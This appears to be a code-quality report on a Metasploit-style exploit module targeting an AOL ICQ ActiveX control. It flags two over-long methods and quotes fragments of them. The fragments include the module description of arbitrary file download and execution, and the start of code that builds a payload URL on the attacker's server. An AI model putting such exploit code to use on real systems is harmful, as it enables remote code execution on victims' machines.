modules/exploits/windows/browser/aol_icq_downloadagent.rb
Method initialize
has 31 lines of code (exceeds 25 allowed). Consider refactoring. Open
Open
def initialize(info = {})
super(update_info(info,
'Name' => 'America Online ICQ ActiveX Control Arbitrary File Download and Execute',
'Description' => %q{
This module allows remote attackers to download and execute arbitrary files
Method on_request_uri
has 26 lines of code (exceeds 25 allowed). Consider refactoring. Open
Open
def on_request_uri(cli, request)
payload_url = "http://"
payload_url += (datastore['SRVHOST'] == '0.0.0.0') ? Rex::Socket.source_address(cli.peerhost) : datastore['SRVHOST']
payload_url += ":" + datastore['SRVPORT'].to_s + get_resource() + "/PAYLOAD"